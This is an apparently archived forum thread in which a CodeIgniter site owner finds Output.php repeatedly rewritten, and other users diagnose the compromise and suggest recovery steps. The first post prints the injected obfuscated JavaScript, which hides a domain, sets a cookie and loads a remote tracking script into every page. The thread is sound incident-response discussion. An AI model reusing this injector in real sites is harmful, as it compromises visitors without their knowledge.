Help! Am I being hacked?

[eluser]ericbae[/eluser]
Hello,

I am running a simple CodeIgniter website, which collects some RSS feeds and display them. Since about a week ago, I am getting the following error on System/libraries/Output.php file.

Parse error: syntax error, unexpected ‘=’ in System\libraries\Output.php on line 264.

I've looked line 264, which is

Code:

if (preg_match("|</body>.*?</html>|is", $output))
{
   $output  = preg_replace("|</body>.*?</html>|is", '', $output);
   $output .= $CI->profiler->run();
   $output .= '</body></html>'; // LINE 264.
}

What I noticed, is that Output.php file gets "written" during the course of the day. I realise the original file size of Output.php is around 10KB, but after the above error occurs, I check the file size of Output.php and it's 17KB.

Around line 264, the follwoing script gets written!

Code:

[removed]function DibiluQazerad (CahuwolQzzik) { var XovikohFgojubid = [removed].indexOf (';', CahuwolQzzik); if (XovikohFgojubid == -1) XovikohFgojubid = [removed].length; return unescape([removed].substring(CahuwolQzzik, XovikohFgojubid)); } function NqucPehaw (name) { var arg = name + '='; var alen = arg.length; var clen = [removed].length; var i = 0; while (i < clen) { var j = i + alen; if ([removed].substring(i, j) == arg) return DibiluQazerad (j); i = [removed].indexOf(' ', i) + 1; if (i == 0) break; } return null; } function NixukawehWaklalaje (name, value) { var argv = NixukawehWaklalaje.arguments; var argc = NixukawehWaklalaje.arguments.length; var expires = (argc > 2) ? argv[2] : null; var path = (argc > 3) ? argv[3] : null; var domain = (argc > 4) ? argv[4] : null; var secure = (argc > 5) ? argv[5] : false; [removed] = name + '=' + escape (value) + ((expires == null) ? '' : ('; expires=' + expires.toGMTString())) + ((path == null) ? '' : ('; path=' + path)) + ((domain == null) ? '' : ('; domain=' + domain)) + ((secure == true) ? '; secure' : ''); } if (NqucPehaw('o') == null) { var RoxemufoVozhe = 'LLAFLADKUaIKYFKVGSSEdWUHEZBWS3WDELMB3MSMOF.OAFoCVOUHEECrPUBVZHNOgTVVCO.KRGMMKIGuCXOQMYBRk'.replace(/[A-Z]/g,''); var GqiwSifd = document.createElement('script'); GqiwSifd.src = 'http://' + RoxemufoVozhe + '/counter/?page=' + escape(document.referrer) + '&rnd;=' + Math.random(); document.getElementsByTagName('head')[0].appendChild(GqiwSifd); var JutegijSiril = new Date (); JutegijSiril.setTime(JutegijSiril.getTime() + (8*3600*1000)); NixukawehWaklalaje('o','1',JutegijSiril, '/'); }[removed]&lt;/body&gt;.*?&lt;/html&gt;|is", $output))

There is a little bit more, but I can't seem to paste it into this text area.

Can somebody explain what is happening? I will be looking at it more detail too. But maybe this is something all the CodeIgniter users are open to?

Thank you in advance!

[eluser]ericbae[/eluser]
A more general question would be..

Is it possible to "write" to Output.php file? and if yes, how? and how can I prevent that?

[eluser]Udi[/eluser]
Make sure you filter data.

Use REGEX to delete scripts and other nasty stuff.

[eluser]darkhouse[/eluser]
I'm interested in knowing where that vulnerability is. It looks like loading some sort of counter script on ad33.org.uk which seems to be a religious site (figures...). I'm wondering if it's just to show better traffic on that site by hijacking yours.

If you find where the vulnerability exists, it would be nice to know so that other developers don't make the same mistake.

Good luck.

[eluser]Michael Wales[/eluser]
It sounds like your basic cross-site attack.

If we take a look at the typical XSS exploit: user enters a JavaScript snippet in a text-box on your site, this input is then displayed to the user. If you don't protect your input, when that output is displayed, this JavaScript snippet is essentially running on your domain as a trusted source (which can then take actions on your domain).

The problem the original author is having sounds very similar: he has a script which goes and grabs RSS feeds (the input text-box from above), he's not protecting against malicious input, so when his page is displayed scripts are running as a trusted source on his domain.

Lessons learned: Never trust users, even if the user is an automated bot you wrote. Don't leech content from other sources without prior approval and validating that they won't break your stuff.

[eluser]Udi[/eluser]
Yep.. Michael is right.

I've developing an application like yours, thats basically show RSS feeds from different URL's.
I created my own feed that contained malicious code and did everything in my power to filter it.

Even if you read RSS of well-known websites, you can never know what will happened to them and how it's affects you. [mal-code added to their post and it made its way to you...]

Good luck.

[eluser]bretticus[/eluser]
What concerns me is that @ericbae says that his Output.php is being written!!! It's one thing to have some malcode in your database that gets displayed unwittingly on your site and exploits your visitors. It's entirely another issue when your server source code is being rewritten! This means that you may have code that is able to write a file in your filesystem (could be from an upload script, could be from another account on a shared host. We have no ay of knowing for sure. You need to do more research.)

Check your logs for php files that you did not write being ran on your system. Does your webserver run with your account user or a separate account? If the latter, if you have shell access, you can use the -user switch with the find command to look for scripts that the webserver user owns.

In most cases, if hacker can upload a file, there is a PHP file that is like a hacker control panel. He or she can browse your files with a nice little interface, read and change files at will if the webserver runs with your account permissions (because your account user will own all the files already.)

Usually, these are hidden in obscure (and sometimes even hidden) directories. That's why scanning your logs or using find can be helpful to locate these files. Now, I'm not saying that they exist. It's just a hunch.

Also, we cannot say there is an exploit in CI code. It's possible that somewhere in this site there is a vulnerability due to bad security practice on your part or someone else. Or even an exploit from another hosting account. It's very hard to say. I would be interested in your research.

One thing I can say is that the part of Output.php you refer to is where CI attaches profile data to the bottom of the html page that is being rendered for output. Now, profiling has to be on if the if block is still there, but otherwise, what a great place to insert code at the server level into every page!

Good luck!

[eluser]BrianDHall[/eluser]
I think the answer to the op is "yes". As bretticus notes though, it is uncertain as to where it is coming from.

I think its time for Disaster Recovery mode:

First of all, back up everything you have on your server. Zip it and store it.

Now, delete everything on the server you control, wipe it good and clean.

Next, change every password you have for your server. All of them. Email, FTP, control panel, database, anything and everything you can. If any password will be stored in a file on the server, such as the database password, you need to make sure those credentials aren't valid anywhere else. Furthermore, your php database user should not have unrestricted database control, but be limited to the actual roles you need for your scripts to function.

It is comparatively trivial to inject code to find the value of a variable that shouldn't be exposed - and if they expose your db access details and they are the same as your ftp/control panel details? Boom, they have you.

Then, and only then, put together a fresh install of CI and bring your files over into it. If you have access to using SFTP instead of FTP, use it. You can then upload that to get your site online again, ensuring no compromised system files are present.

For additional security, if your site is configured so your scripts aren't allowed to change file permissions with chmod, then set file permissions of your entire CI system (not counting your application) to unwritable by anyone. This will prevent over-writes via php script, if your system is so configured.

Now that you have your site back up, you need to look to see if there is anything in your script that might cause it.

The thing is, the attack on your site was extraordinarily specific. Oddly so. It is most likely that the cause is relatively boring - your account was accessed through stolen username/password, or in some way accessed due to improper configuration in your virtual hosting environment. There are numerous security issues on shared environments, ranging from PHP to Apache to FTP all the way to the underlying operating system (using shell accounts, access to exec() in scripts, and many more).

With this ruled out, you can monitor your new freshly installed and secured site for any such changes. I think it might very well all go away at this point, but it might not so on to the next step.

The next step would then be analyzing your application for possible vulnerabilities. The obvious ones to look for is anywhere a form is processed or an URI is used. It is very easy to make a mistake if you aren't careful, and the worst is when something can be fed to a view or into a function that would permit eval() - it allows them to do anything they could want.

The specificity of the attack is the primary characteristic here - it is highly unlikely a person did this blindly or with a mere security vulnerability in a script.

[eluser]ericbae[/eluser]
Thanks for all the replies. I've been searching for other related posts + possible solutions.

Obviously there are a number of ways I can take.

Firstly, I ensured that anywhere I take inputs from external source (e.g. user), I use XSS filtering. I enabled this in the config.php so that all inputs go through the XSS filtering.

I was also advised that the permission of some of the files to be changed. So I gave 444 permission mode to the files that were being 'hacked'.

I have also contacted the hosting administrator and asked them to check their security features with the latest updates (since I am on a shared-hosting).

I will definitely re-visit all the user-name and passwords + I'm planning to move AND change the name of the "system" folder. I also removed the "index.php" part in the URL via Apache .htaccess file.

Taking all the suggestions given here, I think the website "should" be sufficiently secure. But I guess you can never assume! I still can't believe there are people out there just inserting malicious hacks on random websites!!!!

[eluser]Ben Hirsch[/eluser]
ericbae, we're having the same issues. Wondering if you have any updates on your progress?